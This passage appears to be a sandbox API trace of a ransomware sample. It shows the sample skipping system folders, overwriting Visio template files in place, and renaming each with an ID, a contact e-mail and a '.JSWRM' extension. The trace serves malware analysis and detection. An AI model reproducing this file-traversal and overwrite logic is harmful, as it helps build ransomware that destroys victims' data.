| out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.732] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.732] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.732] CloseHandle (hObject=0x314) returned 1 [0146.732] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comps_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPS_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comps_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.733] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ba18c4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ba18c4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1beddbb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2b0f2, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="COMPS_U.VSSX", cAlternateFileName="COMPS_~1.VSS")) returned 1 [0146.733] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2=".") returned 1 [0146.733] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="..") returned 1 [0146.733] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="...") returned 1 [0146.733] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="windows") returned -1 [0146.734] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="recovery") returned -1 [0146.734] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="perflogs") returned -1 [0146.734] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="documents and settings") returned -1 [0146.734] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.734] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="system volume information") returned -1 [0146.734] lstrcmpiW (lpString1="COMPS_U.VSSX", lpString2="msocache") returned -1 [0146.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPS_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPS_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPS_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comps_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.735] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=176370) returned 1 [0146.735] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.735] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0146.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.751] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0146.751] CloseHandle (hObject=0x314) returned 1 [0146.751] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comps_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\COMPS_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\comps_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.753] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c5b962, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4c5b962, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c5b962, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x11591, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CONLOG_M.VSTX", cAlternateFileName="CONLOG~2.VST")) returned 1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2=".") returned 1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="..") returned 1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="...") returned 1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="windows") returned -1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="recovery") returned -1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="perflogs") returned -1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="documents and settings") returned -1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="system volume information") returned -1 [0146.753] lstrcmpiW (lpString1="CONLOG_M.VSTX", lpString2="msocache") returned -1 [0146.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONLOG_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONLOG_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONLOG_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\conlog_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.754] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=71057) returned 1 [0146.754] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.754] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11590, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x11590, lpOverlapped=0x0) returned 1 [0146.761] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.761] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11590, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x11590, lpOverlapped=0x0) returned 1 [0146.762] CloseHandle (hObject=0x314) returned 1 [0146.762] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONLOG_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\conlog_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONLOG_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\conlog_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.763] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c5b962, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4c5b962, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c5b962, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x11596, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CONLOG_U.VSTX", cAlternateFileName="CONLOG~1.VST")) returned 1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2=".") returned 1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="..") returned 1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="...") returned 1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="windows") returned -1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="recovery") returned -1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="perflogs") returned -1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="documents and settings") returned -1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="system volume information") returned -1 [0146.763] lstrcmpiW (lpString1="CONLOG_U.VSTX", lpString2="msocache") returned -1 [0146.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONLOG_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONLOG_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONLOG_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONLOG_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\conlog_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.764] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=71062) returned 1 [0146.764] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.765] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11590, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x11590, lpOverlapped=0x0) returned 1 [0146.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.771] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11590, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x11590, lpOverlapped=0x0) returned 1 [0146.772] CloseHandle (hObject=0x314) returned 1 [0146.785] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONLOG_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\conlog_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONLOG_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\conlog_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.787] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16dce02, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x16dce02, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1702fda, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x250fd, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CONNEC_M.VSSX", cAlternateFileName="CONNEC~1.VSS")) returned 1 [0146.787] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2=".") returned 1 [0146.787] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="..") returned 1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="...") returned 1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="windows") returned -1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="recovery") returned -1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="perflogs") returned -1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="documents and settings") returned -1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="system volume information") returned -1 [0146.788] lstrcmpiW (lpString1="CONNEC_M.VSSX", lpString2="msocache") returned -1 [0146.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNEC_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNEC_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONNEC_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\connec_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.790] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=151805) returned 1 [0146.790] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.790] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x250f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x250f0, lpOverlapped=0x0) returned 1 [0146.803] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.803] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x250f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x250f0, lpOverlapped=0x0) returned 1 [0146.804] CloseHandle (hObject=0x314) returned 1 [0146.804] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONNEC_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\connec_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONNEC_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\connec_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.805] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x33eb904, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x33eb904, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x33eb904, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x22dfd, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CONNEC_U.VSSX", cAlternateFileName="CONNEC~2.VSS")) returned 1 [0146.805] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2=".") returned 1 [0146.805] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="..") returned 1 [0146.805] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="...") returned 1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="windows") returned -1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="recovery") returned -1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="perflogs") returned -1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="documents and settings") returned -1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="system volume information") returned -1 [0146.806] lstrcmpiW (lpString1="CONNEC_U.VSSX", lpString2="msocache") returned -1 [0146.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNEC_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONNEC_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNEC_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONNEC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\connec_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.807] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=142845) returned 1 [0146.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.807] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22df0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x22df0, lpOverlapped=0x0) returned 1 [0146.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.816] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22df0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x22df0, lpOverlapped=0x0) returned 1 [0146.818] CloseHandle (hObject=0x314) returned 1 [0146.818] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONNEC_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\connec_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CONNEC_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\connec_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.819] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, 